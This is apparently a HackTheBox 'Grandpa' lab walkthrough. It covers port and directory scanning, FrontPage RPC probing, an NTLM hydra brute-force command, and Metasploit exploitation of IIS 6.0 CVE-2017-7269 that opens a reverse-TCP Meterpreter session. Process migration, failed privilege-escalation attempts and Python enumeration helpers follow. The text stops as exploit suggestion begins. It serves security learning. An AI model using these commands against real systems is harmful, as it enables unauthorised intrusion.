Grandpa is an easy-rated Windows machine on HackTheBox. When I worked through it myself I got stuck on FrontPage-related exploitation: several attempts turned up some information, but no foothold. Looking back from the outside, I was too locked onto the information I already had, kept going down one road and lost patience. Going forward I want to shift my approach from depth-first to breadth-first.

Port scan

Full TCP port scan:

uzi@kali ~/D/06_Wordlists> nmap -n --min-rate 2000 -T4 -p- --max-retries 10 -Pn 10.129.104.78
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-13 21:11 CST
Nmap scan report for 10.129.104.78
Host is up (0.20s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 104.34 seconds

Scan parameters:

  • -n: no DNS resolution
  • --min-rate: minimum number of packets sent per second
  • -T4: timing template 4, "aggressive", which assumes a stable, reliable network
  • -p-: scan all 65535 TCP ports
  • --max-retries 10: cap on probe retransmissions per port
  • -Pn: skip host discovery and treat the host as up

Only one open port was identified; the other 65534 ports are reported as filtered (no response), meaning the probes were dropped rather than rejected.

WEB 80

The home page is the IIS default "Under Construction" page (iisstart.htm); the response headers are:

HTTP/1.1 200 OK
Content-Length: 1433
Content-Type: text/html
Content-Location: http://10.129.104.78/iisstart.htm
Last-Modified: Fri, 21 Feb 2003 15:48:30 GMT
Accept-Ranges: bytes
ETag: "05b3daec0d9c21:300"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 13 Apr 2023 13:15:06 GMT
Connection: close

Web content scan

uzi@kali ~/D/0/ferobuster [1]> ./feroxbuster -u http://10.129.104.78/

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.2
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.129.104.78/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.2
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 33l 199w 1635c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 151c http://10.129.104.78/images => http://10.129.104.78/images/
200 GET 1l 23w 3080c http://10.129.104.78/pagerror.gif
200 GET 39l 159w 1433c http://10.129.104.78/
403 GET 2l 15w 218c http://10.129.104.78/aspnet_client
403 GET 29l 188w 1529c http://10.129.104.78/_vti_log
403 GET 29l 188w 1529c http://10.129.104.78/_vti_cnf
403 GET 29l 188w 1529c http://10.129.104.78/_vti_pvt
403 GET 29l 188w 1529c http://10.129.104.78/_vti_txt
403 GET 29l 188w 1529c http://10.129.104.78/_private
301 GET 2l 10w 151c http://10.129.104.78/Images => http://10.129.104.78/Images/
301 GET 2l 10w 157c http://10.129.104.78/_vti_bin => http://10.129.104.78/%5Fvti%5Fbin/
301 GET 2l 10w 151c http://10.129.104.78/IMAGES => http://10.129.104.78/IMAGES/
403 GET 2l 15w 218c http://10.129.104.78/Aspnet_client
301 GET 2l 10w 170c http://10.129.104.78/%5Fvti%5Fbin/_vti_aut => http://10.129.104.78/%5Fvti%5Fbin/%5Fvti%5Faut/
403 GET 29l 188w 1529c http://10.129.104.78/_Private
403 GET 2l 15w 218c http://10.129.104.78/aspnet_Client
403 GET 2l 15w 218c http://10.129.104.78/ASPNET_CLIENT
403 GET 29l 188w 1529c http://10.129.104.78/_PRIVATE
403 GET 29l 188w 1529c http://10.129.104.78/_VTI_CNF
403 GET 29l 188w 1529c http://10.129.104.78/_VTI_PVT
403 GET 29l 188w 1529c http://10.129.104.78/_VTI_TXT
403 GET 29l 188w 1529c http://10.129.104.78/_VTI_LOG
301 GET 2l 10w 170c http://10.129.104.78/%5Fvti%5Fbin/_vti_adm => http://10.129.104.78/%5Fvti%5Fbin/%5Fvti%5Fadm/
400 GET 1l 4w 34c http://10.129.104.78/error%1F_log
400 GET 1l 4w 34c http://10.129.104.78/images/error%1F_log
400 GET 1l 4w 34c http://10.129.104.78/Images/error%1F_log
400 GET 1l 4w 34c http://10.129.104.78/%5Fvti%5Fbin/error%1F_log
400 GET 1l 4w 34c http://10.129.104.78/IMAGES/error%1F_log
[####################] - 4m 150012/150012 0s found:28 errors:3339
[####################] - 4m 30000/30000 107/s http://10.129.104.78/
[####################] - 4m 30000/30000 109/s http://10.129.104.78/images/
[####################] - 4m 30000/30000 111/s http://10.129.104.78/Images/
[####################] - 4m 30000/30000 111/s http://10.129.104.78/%5Fvti%5Fbin/
[####################] - 2m 30000/30000 227/s http://10.129.104.78/IMAGES/

The web scan turns up many directories beginning with _vti_. Searching for _vti_pvt shows that these are created by FrontPage (Server Extensions), and that became the basis for the vulnerability search that followed.

https://www.petenetlive.com/KB/Article/0000742

As it turns out these folders are needed for FrontPage and FrontPage Extensions. I CAN simply delete them, but since my web host provides me with cPanel access to the website, I can simply disable the extensions there, and this removes all the junk for me. (I don’t intend to use FrontPage).

FrontPage exploitation attempts

GitHub: deepak0401/Front-Page-Exploit

https://raw.githubusercontent.com/deepak0401/Front-Page-Exploit/master/README.md

Testing with the payloads from that README:

An unauthenticated open service call to /_vti_bin/shtml.dll/_vti_rpc is refused:

POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.1
Host: 10.129.104.78
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

method=open+service%3a3%2e0%2e2%2e1105&service%5fname=%2f


<html><head><title>vermeer RPC packet</title></head>
<body>
<p>method=open service:3.0.2.1105
<p>status=
<ul>
<li>status=917505
<li>osstatus=0
<li>msg=The user '(unknown)' is not authorized to execute the 'open service' method.
<li>osmsg=
</ul>
</body>
</html>

The server version method, however, answers without authentication and reports FrontPage Server Extensions 5.0.2.6790:

POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.1
Host: 10.129.104.78
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

method=server+version%3a4%2e0%2e2%2e2611

<html><head><title>vermeer RPC packet</title></head>
<body>
<p>method=server version:4.0.2.2611
<p>server version=
<ul>
<li>major ver=5
<li>minor ver=0
<li>phase ver=2
<li>ver incr=6790
</ul>
<p>source control=1
</body>
</html>
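The two RPC calls above can be scripted. The following is an added example (not code from this post, nor from sparty or the deepak0401 repository): it reproduces the form encoding seen in the captured requests, parses the vermeer RPC packet replies (both replies embedded below are taken verbatim from the captures above), and chains server version into list services using the version string the server reports, which is the value the list services call later on this page carries. The raw-socket rpc_call helper and the enumerate_fpse flow assume the endpoint path and headers shown in the captures; the parser deliberately handles only the flat <p>/<li> layout of these two replies and leaves the nested meta_info list of list services as raw text.

```python
import re
import socket

# Replies captured on this page (the two _vti_rpc exchanges above).
VERSION_REPLY = """<html><head><title>vermeer RPC packet</title></head>
<body>
<p>method=server version:4.0.2.2611
<p>server version=
<ul>
<li>major ver=5
<li>minor ver=0
<li>phase ver=2
<li>ver incr=6790
</ul>
<p>source control=1
</body>
</html>
"""

ERROR_REPLY = """<html><head><title>vermeer RPC packet</title></head>
<body>
<p>method=open service:3.0.2.1105
<p>status=
<ul>
<li>status=917505
<li>osstatus=0
<li>msg=The user '(unknown)' is not authorized to execute the 'open service' method.
<li>osmsg=
</ul>
</body>
</html>
"""


def fp_encode(value: str) -> str:
    """Encode a field the way the captured requests do: ASCII letters and digits
    pass through, space becomes '+', every other byte becomes lowercase %xx
    (':' -> %3a, '.' -> %2e, '_' -> %5f, '/' -> %2f)."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ch == " ":
            out.append("+")
        else:
            out.extend(f"%{b:02x}" for b in ch.encode("utf-8"))
    return "".join(out)


def build_rpc_body(method: str, **params: str) -> str:
    """POST body for /_vti_bin/shtml.dll/_vti_rpc; 'method' always comes first."""
    fields = [("method", method)] + list(params.items())
    return "&".join(f"{fp_encode(k)}={fp_encode(v)}" for k, v in fields)


def parse_vermeer(body: str) -> dict:
    """Flatten a 'vermeer RPC packet' reply: <p>key=value lines become top-level
    entries; a <p>key= line with an empty value opens a section and the <li>
    key=value lines after it are stored under that key."""
    result = {}
    section = None
    for raw in body.splitlines():
        line = raw.strip()
        m = re.match(r"<p>([^=<]+)=(.*)$", line)
        if m:
            key, val = m.group(1).strip(), m.group(2).strip()
            if val:
                result[key] = val
                section = None
            else:
                result[key] = {}
                section = key
            continue
        m = re.match(r"<li>([^=<]+)=(.*)$", line)
        if m and section is not None:
            result[section][m.group(1).strip()] = m.group(2).strip()
    return result


def fpse_version(reply: str) -> str:
    """'5.0.2.6790' from a server version reply."""
    sv = parse_vermeer(reply)["server version"]
    return ".".join(sv[k] for k in ("major ver", "minor ver", "phase ver", "ver incr"))


def rpc_error(reply: str):
    """(status code, message) when the server refused the method, else None."""
    st = parse_vermeer(reply).get("status")
    if isinstance(st, dict) and st.get("status"):
        return st["status"], st.get("msg", "")
    return None


def rpc_call(host: str, body: str, port: int = 80, timeout: float = 10.0) -> str:
    """Send one unauthenticated _vti_rpc POST over a raw socket and return the
    response body. Mirrors the captured requests (no Authorization header).
    Needs network access; not exercised offline."""
    req = (
        "POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n\r\n"
        f"{body}"
    )
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(req.encode())
        raw = b""
        while chunk := s.recv(4096):
            raw += chunk
    text = raw.decode("latin-1")
    return text.split("\r\n\r\n", 1)[1] if "\r\n\r\n" in text else text


def enumerate_fpse(host: str) -> dict:
    """Chain the calls: learn the extension version first, then put that version
    into the method string of list services, as the later capture on this page does."""
    version = fpse_version(rpc_call(host, build_rpc_body("server version:4.0.2.2611")))
    services = rpc_call(host, build_rpc_body(f"list services:{version}"))
    return {"version": version, "services_raw": services, "error": rpc_error(services)}
```

rpc_error is the check worth running on every reply: a refused method comes back as HTTP 200 with a status block, so nothing but the body tells you whether the call worked.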

_vti_inf.html

/_vti_inf.html, the configuration file the FrontPage client reads, is also readable and confirms the version and the RPC endpoints:

<body>
<!-- _vti_inf.html version 0.100>
<!--
This file contains important information used by the FrontPage client
(the FrontPage Explorer and FrontPage Editor) to communicate with the
FrontPage server extensions installed on this web server.

The values below are automatically set by FrontPage at installation. Normally, you do not need to modify these values, but in case
you do, the parameters are as follows:

'FPShtmlScriptUrl', 'FPAuthorScriptUrl', and 'FPAdminScriptUrl' specify
the relative urls for the scripts that FrontPage uses for remote
authoring. These values should not be changed.

'FPVersion' identifies the version of the FrontPage Server Extensions
installed, and should not be changed.
--><!-- FrontPage Configuration Information
FPVersion="5.0.2.6790"
FPShtmlScriptUrl="_vti_bin/shtml.dll/_vti_rpc"
FPAuthorScriptUrl="_vti_bin/_vti_aut/author.dll"
FPAdminScriptUrl="_vti_bin/_vti_adm/admin.dll"
TPScriptUrl="_vti_bin/owssvr.dll"
-->
<p><!--webbot bot="PurpleText"
preview="This page is placed into the root directory of your FrontPage web when FrontPage is installed. It contains information used by the FrontPage client to communicate with the FrontPage server extensions installed on this web server. You should not delete this file."
--></p>

SPartan and sparty

SPartan and sparty are both tools for scanning and exploiting FrontPage; neither has been updated in a long time. I tried both briefly and ended up using sparty more.

There is nothing subtle about using these tools: just try every option in turn.
Specifically:

  1. For my own use I commented out lines 100-104 of sparty_v_0.1.py;
  2. -e rpc_service_listing returned some service information.

Detailed service information:

method=list services:5.0.2.6790

services_list=

    • service_name=
    • meta_info=
      • vti_restartmanual
      • IX|0
      • vti_webservertype
      • SR|msiis
      • vti_textextensions
      • SX|.txt.txt.
      • vti_servercharsets
      • VX|windows-1257 big5 windows-1252 windows-1254 iso-8859-2 iso-8859-15 windows-874 shift_jis utf-8 windows-1251 windows-1256 euc-kr gb2312 windows-1253 windows-1258 koi8-r iso-2022-jp ks_c_5601-1987 windows-1250 windows-1255 euc-jp unicode unicodeFFFE
      • vti_hasglobalasa
      • BR|false
      • vti_timecreated
      • TR|12 Apr 2017 14:17:19 -0000
      • vti_oldestcompatibleversion
      • SR|2.0.0.0
      • vti_publishmetainfokeys
      • VR|vti_assignedto vti_approvallevel vti_categories vti_description
      • vti_textindexood
      • IR|0
      • vti_casesensitiveurls
      • IX|0
      • vti_authpasswdurl
      • SR|/_vti_bin/_vti_adm/fpadmdll.dll?page=pwdmgr.htm&ReturnPage=home
      • vti_htmlextensions
      • SX|.htm.html.html.htm.hxt.shtml.shtm.stm.htt.htx.asp.aspx.alx.asa.hta.htc.jsp.cfm.odc.dwt.
      • vti_approvallevels
      • VR|Approved Denied Pending\ Review
      • vti_hassearchbot
      • BR|false
      • vti_dependenciesood
      • IR|0
      • vti_welcomenames
      • VX|Default.htm Default.asp index.htm iisstart.htm Default.aspx
      • vti_adminurl
      • SR|/_vti_bin/_vti_adm/fpadmdll.dll
      • vti_servertz
      • SX|+0300
      • vti_featurelist
      • VX|vti_ACCreateNewUsers vti_ACChangePassword vti_ACNoUserGroup vti_ACCreateNewGroups vti_ACModifyGroups vti_ServiceMarkUrlDirExec vti_ACIPAddresses vti_ServerEmailTransport vti_ServerIndexServer vti_ServerCollab vti_TimedDocEvents
      • vti_categories
      • VR|Travel Expense\ Report Business Competition Goals/Objectives Ideas Miscellaneous Waiting VIP In\ Process Planning Schedule
      • vti_insecureserverurl
      • SR|http://10.129.198.216
      • vti_approvalapproved
      • SR|Approved
      • vti_approvaldenied
      • SR|Denied
      • vti_defaultcharset
      • SR|windows-1252
      • vti_autorecalc
      • IX|1
      • vti_httpdversion
      • SX|Microsoft-IIS/6.0
      • vti_serverlanguages
      • VX|en-us
      • vti_disableautoimgsizeexts
      • SX|.asp
      • vti_createpostinfo
      • BX|false
      • vti_extenderversion
      • SR|5.0.2.6790
      • vti_longfilenames
      • IX|1

What caught my attention in this output was the password-manager URL:

<li>vti_authpasswdurl
<li>SR|/_vti_bin/_vti_adm/fpadmdll.dll?page&#61;pwdmgr.htm&#38;ReturnPage&#61;home

Web login page and NTLM brute force

Visiting that URI prompts for credentials; after a few attempts it became clear that NTLM authentication is in use.
Brute-forcing with hydra yielded nothing, and at that point I had mentally given up.

hydra  -l webmaster -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt "http-get://10.129.55.9/_vti_bin/_vti_adm/fpadmdll.dll?page=pwdmgr.htm&ReturnPage=home:A=NTLM:F=You are not authorized to view this page"

IIS 6.0 vulnerability

At this point I read the official walkthrough and learned that the foothold is CVE-2017-7269. I was curious how one would know to use this particular bug; it turns out that simply searching for "microsoft iis 6.0 vulnerabilities" returns it as the very first result 🙃.

I had largely ignored the web server's response headers, yet the Server: Microsoft-IIS/6.0 banner was the whole clue:

HTTP/1.1 200 OK
Content-Length: 1433
Content-Type: text/html
Content-Location: http://10.129.104.78/iisstart.htm
Last-Modified: Fri, 21 Feb 2003 15:48:30 GMT
Accept-Ranges: bytes
ETag: "05b3daec0d9c21:300"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 13 Apr 2023 13:15:06 GMT
Connection: close

Searching for CVE-2017-7269 turns up k0shl's analysis: CVE-2017-7269 IIS6.0远程代码执行漏洞分析及Exploit (analysis and exploit of the IIS 6.0 remote code execution vulnerability).
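As an added example (not from this post or the official walkthrough), here is the check I would run before reaching for the Metasploit module: parse the response head captured above, confirm the target is IIS 6.x with FrontPage extensions, then send an OPTIONS request to see whether WebDAV is enabled at all. CVE-2017-7269 is in the WebDAV extension (ScStoragePathFromUrl in httpext.dll), so an IIS 6 host with WebDAV turned off is not exploitable this way no matter what the Server banner says. The GET / head below is the one captured above; the two OPTIONS replies are constructed samples (one with WebDAV on, one off) and were not captured from the box; the options_head helper performs a real request and is not exercised offline.

```python
import re
import socket

# Response head captured on this page (the GET / reply).
PAGE_HEAD = """HTTP/1.1 200 OK
Content-Length: 1433
Content-Type: text/html
Content-Location: http://10.129.104.78/iisstart.htm
Last-Modified: Fri, 21 Feb 2003 15:48:30 GMT
Accept-Ranges: bytes
ETag: "05b3daec0d9c21:300"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 13 Apr 2023 13:15:06 GMT
Connection: close
"""

# Constructed sample: an OPTIONS reply from an IIS 6 host with WebDAV enabled.
# Not captured from the box; shaped after what IIS 6 sends in that configuration.
OPTIONS_WEBDAV = """HTTP/1.1 200 OK
Date: Thu, 13 Apr 2023 13:20:00 GMT
Server: Microsoft-IIS/6.0
MS-Author-Via: MS-FP/4.0,DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Cache-Control: private
"""

# Constructed sample: the same server with WebDAV disabled.
OPTIONS_NO_WEBDAV = """HTTP/1.1 200 OK
Date: Thu, 13 Apr 2023 13:20:00 GMT
Server: Microsoft-IIS/6.0
Allow: OPTIONS, TRACE, GET, HEAD, POST
Content-Length: 0
"""


def parse_head(raw: str):
    """Split an HTTP response head into (status code, {lowercase name: value}).
    Repeated headers are joined with ', '."""
    lines = raw.strip().splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return status, headers


def fingerprint(headers: dict) -> dict:
    """What the default page's headers reveal: product and version, whether
    FrontPage Server Extensions are installed, and whether ASP.NET is wired in."""
    server = headers.get("server", "")
    m = re.match(r"Microsoft-IIS/(\d+)\.(\d+)", server)
    return {
        "server": server,
        "iis_version": (int(m.group(1)), int(m.group(2))) if m else None,
        "frontpage": "microsoftofficewebserver" in headers,
        "aspnet": headers.get("x-powered-by", "").upper() == "ASP.NET",
    }


def webdav_enabled(headers: dict) -> bool:
    """WebDAV is reachable when the OPTIONS reply carries a DAV compliance-class
    header and advertises PROPFIND, the verb the WebDAV extension handles."""
    methods = {m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()}
    return "dav" in headers and "PROPFIND" in methods


def iis6_webdav_exposed(head_raw: str, options_raw: str) -> bool:
    """The precondition the exploit module needs: IIS 6.x and WebDAV enabled."""
    _, h = parse_head(head_raw)
    _, o = parse_head(options_raw)
    fp = fingerprint(h)
    return fp["iis_version"] is not None and fp["iis_version"][0] == 6 and webdav_enabled(o)


def options_head(host: str, path: str = "/", port: int = 80, timeout: float = 10.0) -> str:
    """Send a real OPTIONS request and return the response head (network; not run offline)."""
    req = f"OPTIONS {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(req.encode())
        raw = b""
        while chunk := s.recv(4096):
            raw += chunk
    return raw.decode("latin-1").split("\r\n\r\n", 1)[0]
```

Feeding options_head(target) into iis6_webdav_exposed alongside the captured GET head answers, in one round trip, the question the three failed runs against 10.129.55.9 below leave open.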

Metasploit exploitation

msf6 > search platform:windows iis 6.0

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow
1 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl

msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

Name Current Setting Required Description
---- --------------- -------- -----------
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.70.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Microsoft Windows Server 2003 R2 SP2 x86



View the full module info with the info, or info -d command.

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set -g lhost tun0
lhost => tun0
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set -g rhosts 10.129.55.9
rhosts => 10.129.55.9
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.16.22:4444
[*] Trying path length 3 to 60 ...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.16.22:4444
[*] Trying path length 3 to 60 ...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.16.22:4444
[*] Trying path length 3 to 60 ...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.129.213.72
rhosts => 10.129.213.72
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.16.22:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175686 bytes) to 10.129.213.72
[*] Meterpreter session 1 opened (10.10.16.22:4444 -> 10.129.213.72:1030) at 2023-04-16 14:25:10 +0800

meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
272 4 smss.exe
320 272 csrss.exe
344 272 winlogon.exe
392 344 services.exe
404 344 lsass.exe
584 392 svchost.exe
668 392 svchost.exe
732 392 svchost.exe
764 392 svchost.exe
796 392 svchost.exe
988 392 spoolsv.exe
1016 392 msdtc.exe
1096 392 cisvc.exe
1136 392 svchost.exe
1192 392 inetinfo.exe
1228 392 svchost.exe
1340 392 VGAuthService.exe
1400 392 vmtoolsd.exe
1504 392 svchost.exe
1616 392 svchost.exe
1724 392 dllhost.exe
1788 392 dllhost.exe
1956 392 alg.exe
1972 584 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2116 392 vssvc.exe
2184 1504 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2292 584 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
2392 2184 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
2576 584 wmiprvse.exe

meterpreter > migrate 2184
[*] Migrating from 2392 to 2184...
[*] Migration completed successfully.

Process migration

There is a migrate 2184 step above. In my own testing, without migrating, none of the privilege-escalation modules that local_exploit_suggester later recommends could be used successfully.

The error is Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.

The official walkthrough explains the migration step as follows:

At this point it is a good idea to migrate to a process running under ​NT AUTHORITY\NETWORK
SERVICE​. In this case ​davcdata.exe ​seemed to be the only stable process available.

Another writeup, https://www.rffuste.com/2020/08/31/htb-grandpa/, puts it this way:

We’re working as the process rundll32.exe that it is not owned by network service that is who we are.
We should then migrate to a process owned by us.

msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > use exploit/windows/local/ms15_051_client_copy_image
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms15_051_client_copy_image) > run

[*] Started reverse TCP handler on 10.10.16.22:4444
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms15_051_client_copy_image) > set -g lport 4445
lport => 4445
msf6 exploit(windows/local/ms15_051_client_copy_image) > run

[*] Started reverse TCP handler on 10.10.16.22:4445
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms15_051_client_copy_image) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/ms15_051_client_copy_image) > run

[*] Started reverse TCP handler on 10.10.16.22:4445
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms15_051_client_copy_image) > use exploit/windows/local/ms10_015_kitrap0d
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.16.22:4445
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
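Picking the migration target can be done from the ps listing itself. Added example (not from this post or either walkthrough): parse the meterpreter ps table reproduced above (the rows embedded below are taken from this page's listing, trimmed to the relevant ones) and return the PIDs that match the payload architecture, are explicitly owned by the user we already run as, and are not the process the payload sits in. The exploit's own rundll32.exe shows a blank User column, which lines up with the getsid "Access is denied" error above; w3wp.exe and davcdata.exe, the two processes the walkthroughs name, are ranked first. The preference order and the regex for the space-collapsed table are my own assumptions.

```python
import re

# Process list captured on this page (meterpreter > ps), trimmed.
PS_OUTPUT = r"""
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
392 344 services.exe
404 344 lsass.exe
584 392 svchost.exe
1192 392 inetinfo.exe
1504 392 svchost.exe
1972 584 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2184 1504 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2292 584 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
2392 2184 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
2576 584 wmiprvse.exe
"""

# One row of the space-collapsed table. Arch/Session/User/Path are only present
# for processes meterpreter could open; User is optional because it is blank
# when the token could not be read (the rundll32.exe row above).
ROW = re.compile(
    r"^(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>.+?)"
    r"(?:\s+(?P<arch>x86|x64)\s+(?P<session>\d+)(?:\s+(?P<user>.*?))?"
    r"\s+(?P<path>[A-Za-z]:\\\S*))?\s*$"
)


def parse_ps(text: str) -> list:
    """Rows of the ps table as dicts; header and separator lines are skipped."""
    procs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("PID", "---")):
            continue
        m = ROW.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["pid"], d["ppid"] = int(d["pid"]), int(d["ppid"])
        procs.append(d)
    return procs


def migration_candidates(procs: list, user: str, arch: str, current_pid: int,
                         preferred=("w3wp.exe", "davcdata.exe")) -> list:
    """PIDs worth migrating to: same architecture as the payload, explicitly owned
    by the user we already are, and not the process we are sitting in. Long-lived
    service processes named in 'preferred' sort first, the rest keep table order."""
    ranked = []
    for p in procs:
        if p["pid"] == current_pid or p["arch"] != arch:
            continue
        if (p["user"] or "").lower() != user.lower():
            continue
        name = p["name"].lower()
        rank = preferred.index(name) if name in preferred else len(preferred)
        ranked.append((rank, p["pid"]))
    return [pid for _, pid in sorted(ranked)]


def pick_target(text: str, user: str, arch: str, current_pid: int):
    """First candidate, or None when nothing qualifies (stay put and look elsewhere)."""
    c = migration_candidates(parse_ps(text), user, arch, current_pid)
    return c[0] if c else None
```

With the page's listing, pick_target(PS_OUTPUT, r"NT AUTHORITY\NETWORK SERVICE", "x86", 2392) gives 2184, the w3wp.exe the author migrated to; davcdata.exe (2292) is next.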

Privilege escalation

Searching with the local_exploit_suggester module:

msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.129.55.9 - Collecting local exploits for x86/windows...
